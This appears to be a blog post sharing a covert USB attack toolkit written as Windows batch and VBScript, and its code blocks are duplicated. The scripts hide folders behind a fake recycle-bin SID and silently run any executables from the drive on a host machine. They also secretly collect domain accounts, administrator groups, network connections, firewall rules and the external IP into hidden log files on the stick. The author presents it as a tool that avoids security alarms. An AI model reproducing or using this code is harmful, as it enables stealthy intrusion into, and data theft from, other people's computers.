I have seen many different attempts at creating a USB hacking tool. The switchblade and hacksaw were okay, but they would set off many alarms deeming it useless,
Code:
@(echo off & break off & Title _) >nul
If %~d0 == %systemdrive% goto :EOF
::First Run
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
:Next
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
attrib +s +h %0
cls
exit
If %~d0 == %systemdrive% goto :EOF
::First Run
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
:Next
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
attrib +s +h %0
cls
exit
::__Injector.bat__::
Code:
@(echo off & break off & Title _) >nul
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
if not [%1]==[] goto :%1
call %0 system
exit
:system
if exist inject.vbs start "" "inject.vbs"
echo set o = createobject("wscript.shell") > inject.vbs
echo o.run "%~0 script", vbhide, true >> inject.vbs
start "" "inject.vbs"
exit
:script
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start "" %%j
Goto BatCheck
:BatGood
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start "" %%h
Goto VbsCheck
:VbsGood
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start "" %%i
Del /F /Q inject.vbs >nul
@cls & @Exit
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
if not [%1]==[] goto :%1
call %0 system
exit
:system
if exist inject.vbs start "" "inject.vbs"
echo set o = createobject("wscript.shell") > inject.vbs
echo o.run "%~0 script", vbhide, true >> inject.vbs
start "" "inject.vbs"
exit
:script
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start "" %%j
Goto BatCheck
:BatGood
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start "" %%h
Goto VbsCheck
:VbsGood
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start "" %%i
Del /F /Q inject.vbs >nul
@cls & @Exit
::__Sysinfo.bat__::
Code:
@echo off & @break off & title _
if not [%1]==[] goto :%1
call %0 system
exit
:system
if exist sysinfo.vbs start "" "sysinfo.vbs"
echo set o = createobject("wscript.shell") > sysinfo.vbs
echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
start "" "sysinfo.vbs"
exit
:script
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo *********************************************** >> %logfile%
::This script for external ip was not written by me, got it from spam::
echo Function MyIP_XMLHTTP( )>wan.vbs
echo Dim objRequest, strURL >>wan.vbs
echo MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo strURL = "http://www.whatismyip.com/automation/n09230945.asp" >>wan.vbs
echo Set objRequest = CreateObject( "Microsoft.XMLHTTP" ) >>wan.vbs
echo objRequest.open "GET", strURL, False >>wan.vbs
echo objRequest.send vbNull >>wan.vbs
echo If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs
echo Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject") >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
for /F "tokens=* delims=" %%i in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"') do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo. >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
ping localhost -n 1>nul
Del /F /Q sysinfo.vbs >nul
@cls
@exit
if not [%1]==[] goto :%1
call %0 system
exit
:system
if exist sysinfo.vbs start "" "sysinfo.vbs"
echo set o = createobject("wscript.shell") > sysinfo.vbs
echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
start "" "sysinfo.vbs"
exit
:script
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo *********************************************** >> %logfile%
::This script for external ip was not written by me, got it from spam::
echo Function MyIP_XMLHTTP( )>wan.vbs
echo Dim objRequest, strURL >>wan.vbs
echo MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo strURL = "http://www.whatismyip.com/automation/n09230945.asp" >>wan.vbs
echo Set objRequest = CreateObject( "Microsoft.XMLHTTP" ) >>wan.vbs
echo objRequest.open "GET", strURL, False >>wan.vbs
echo objRequest.send vbNull >>wan.vbs
echo If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs
echo Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject") >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
for /F "tokens=* delims=" %%i in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"') do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo. >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
ping localhost -n 1>nul
Del /F /Q sysinfo.vbs >nul
@cls
@exit
0 comments:
Post a Comment